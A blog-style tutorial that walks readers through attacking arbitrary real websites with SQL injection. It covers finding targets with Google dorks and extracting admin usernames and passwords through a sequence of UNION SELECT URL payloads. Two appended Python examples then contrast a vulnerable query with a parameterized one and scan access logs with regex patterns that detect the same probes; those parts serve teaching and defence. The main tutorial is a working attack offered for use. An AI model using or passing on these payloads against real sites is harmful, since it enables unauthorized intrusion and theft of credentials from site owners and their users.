Hello,
What's up? A major target for hackers is websites, the vulnerable ones. Today we will have a look at a popular method to hack websites; this method is called SQL injection.
Talking about SQL (Structured Query Language), it's a query language used to query and manipulate databases such as MySQL, Oracle etc. We will use simple SQL queries to steal data from sites.
Difficulty: EASY
Below is a step by step guide to penetration:
STEP-1: Find vulnerable websites:
We will use Google Dork commands to find vulnerable sites. Type any of the following queries as a Google search query:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
You may download a list of dorks from http://www.ziddu.com/download/13161874/A...t.zip.html to try.
Now you have a list of websites as the search result. You'll have to visit them one by one to check if they are vulnerable.
But if you are going to hack a particular site, then try this at Google search:
site:www.targetsite.com dork_commands
Replace 'targetsite' with your desired site and dork_commands with dork commands, for example:
site:www.targetsite.com inurl:index.php?id=
STEP-2: Check for vulnerability:
Add a ' (single quotation mark) at the end of the URL (no space between the URL and the mark) in the browser's address bar and hit ENTER. For example:
http://www.targetsite.com/index.php?id=2'
If any SQL-related error is shown as a result, then YOU HAVE A CHANCE!!! PROCEED ON.
STEP-3: Find the number of columns in the database:
Replace the quotation mark (') with order by n; each time replace n with 1,2,3,4 and so on, until you get an error like 'unknown column'. For example, try these URLs one after another until you get an 'unknown column' error:
http://www.targetsite.com/index.php?id=2 order by 1
http://www.targetsite.com/index.php?id=2 order by 2
http://www.targetsite.com/index.php?id=2 order by 3
http://www.targetsite.com/index.php?id=2 order by 4
If you get the 'unknown column' error at, say, n=6, then there are actually (n-1)=(6-1)=5 total columns in the table.
N.B. If the above URL does not work, then add "--" after n; for example,
http://www.targetsite.com/index.php?id=2 order by 1--
http://www.targetsite.com/index.php?id=2 order by 2--
STEP-4: Find vulnerable columns:
Replace "order by n" with "union select columns_sequence" to find vulnerable columns. For example, assuming we got 5 columns at the previous step:
http://www.targetsite.com/index.php?id=2 union select 1,2,3,4,5--
As a result, some values (numbers less than or equal to the total number of columns) will be shown on the page, like the one below:
| 3 Query was empty |
That means column no. 3 is vulnerable (its value is echoed on the page)! We will use the number 3 in the next step.
N.B. If the above URL is not working then try this:
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5--
or try this one:
http://www.targetsite.com/index.php?id=2 union all select 1,2,3,4,5/*
STEP-5: Find the database version:
Replace the vulnerable column (no. 3 in this example) with version() in the URL. For example,
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5--
The database version will be displayed.
N.B. If the above URL does not work, try this:
http://www.targetsite.com/index.php?id=2 union all select 1,2,@@version,4,5/*
If "union+illegal mix of collations (IMPLICIT+COERCIBLE)" is shown, then do either (a) or (b):
(a) Evaluate the MySQL version in this way:
http://www.targetsite.com/index.php?id=2 union all select 1,2,convert(@@version using latin1),4,5/*
(b) Evaluate the MySQL version in this way:
http://www.targetsite.com/index.php?id=2 union all select 1,2,unhex(hex(@@version)),4,5/*
STEP-6: Find the table name:
Assuming that we got database version 5 or 5+ from Step-5, in our URL replace 3 with "group_concat(table_name)" and add at the end of the URL "from information_schema.tables where table_schema=database()". For example,
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--
A list containing the table names will be displayed. Look for names like 'admin' or 'user' or something similar. Say we've found the table name 'admin'.
STEP-7: Find the column name:
Convert the table name (the table name is 'admin' in our example) to a MySQL CHAR() string using the HackBar addon in Firefox:
In the Firefox browser, install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now select sql->Mysql->MysqlChar(). This will open a small window; enter the table name there and click OK.
As a result, CHAR(numbers separated with commas) will be displayed in the HackBar toolbar.
Now, in the URL, replace "group_concat(table_name)" with "group_concat(column_name)" and replace "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=mysqlchar--", but replace "mysqlchar" with the CHAR(number, number, number, number) string you got from HackBar. For example,
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
A list of column names will be shown, like the following:
admin,password,admin_id,admin_password,username,password...
etc.
Now replace "group_concat(column_name)" with group_concat(columnname,0x3a,anothercolumnname); here "columnname" should be replaced by a listed column name and "anothercolumnname" by another listed column name (0x3a is a colon, used as the separator). And replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from tablename" (the table name found in Step-6). For example,
http://www.targetsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5 from admin--
If "column not found" is shown, try with different column names from the obtained list.
Finally, you'll have the username and password list.
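To see why every step above works, here is an added example (not from the original post) in Python with an in-memory SQLite database standing in for the site's MySQL: the vulnerable lookup pastes the id parameter into the query text, while the hardened lookup binds it as a parameter, so the same inputs give an error or extra rows in one case and nothing in the other. The table layout and the SQLite substitutions for MySQL syntax are assumptions noted in the comments.

```python
import sqlite3

# Constructed in-memory stand-in for the tutorial's site database. SQLite, not MySQL:
# group_concat(a,0x3a,b) becomes group_concat(a||':'||b) and there is no information_schema.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article (id INTEGER, title TEXT, body TEXT, author TEXT, views INTEGER);
        INSERT INTO article VALUES (2, 'Welcome', 'first post', 'editor', 10);
        CREATE TABLE admin (admin_id TEXT, admin_password TEXT);
        INSERT INTO admin VALUES ('root', 'constructed-secret');
    """)
    return conn

def lookup_vulnerable(conn, id_param):
    # The flaw behind every step above: the id parameter is pasted into the SQL text,
    # so a quote breaks the statement (Step-2) and UNION SELECT appends rows (Step-4 onwards).
    sql = "SELECT id, title, body, author, views FROM article WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, id_param):
    # Hardened form: the value is bound as data, so it is compared, never parsed as SQL.
    sql = "SELECT id, title, body, author, views FROM article WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()

def errors_out(fn, conn, id_param):
    # True when the query raises a database error, i.e. what Step-2 looks for on the page.
    try:
        fn(conn, id_param)
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    db = build_db()
    probe = "2'"
    union = "-2 and 1=2 union select 1,2,group_concat(admin_id||':'||admin_password),4,5 from admin--"
    print("vulnerable, quote probe raises error:", errors_out(lookup_vulnerable, db, probe))
    print("vulnerable, union payload:", lookup_vulnerable(db, union))
    print("parameterized, union payload:", lookup_parameterized(db, union))
```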
Hope you enjoyed the operation. Next time we will go a bit deeper into SQL injection.
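From the defender's side, the step sequence above is easy to spot in web server access logs. This is an added example, not part of the original post: a small Python scanner that URL-decodes each request path, matches it against signatures for the Step-2 to Step-7 probes, and groups hits per client IP. The log lines are constructed for the example and the rule set is a starting point, not a complete ruleset.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the probe sequence the steps above walk through (constructed for this example).
RULES = [
    ("quote probe (Step-2)",          re.compile(r"\?\S*=[^&\s]*'")),
    ("column counting (Step-3)",      re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union column probe (Step-4)",   re.compile(r"\bunion(\s+all)?\s+select\b", re.I)),
    ("version fingerprint (Step-5)",  re.compile(r"@@version|\bversion\(\)", re.I)),
    ("schema enumeration (Step-6/7)", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("data pull via group_concat",    re.compile(r"\bgroup_concat\(", re.I)),
]

def scan_line(line):
    # Return (client IP, matching rule names) for one combined-format log line, or None.
    m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)', line)
    if not m:
        return None
    ip, raw_path = m.groups()
    path = unquote_plus(raw_path)  # '+' and %20 stand for the spaces shown in the URLs above
    hits = [name for name, rx in RULES if rx.search(path)]
    return (ip, hits) if hits else None

def scan_log(lines):
    # Group hits per client so one source walking Step-2 through Step-7 stands out.
    by_ip = {}
    for line in lines:
        hit = scan_line(line)
        if hit:
            by_ip.setdefault(hit[0], set()).update(hit[1])
    return by_ip

# Constructed sample log: one benign visitor and one client following the tutorial.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?id=2\' HTTP/1.1" 500 312',
    '198.51.100.4 - - [10/Oct/2023:13:56:20 +0000] "GET /index.php?id=2+order+by+6-- HTTP/1.1" 500 312',
    '198.51.100.4 - - [10/Oct/2023:13:57:05 +0000] "GET /index.php?id=-2%20and%201=2%20union%20select%201,2,3,4,5-- HTTP/1.1" 200 4096',
    '198.51.100.4 - - [10/Oct/2023:13:58:40 +0000] "GET /index.php?id=-2+and+1=2+union+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4200',
]

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```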
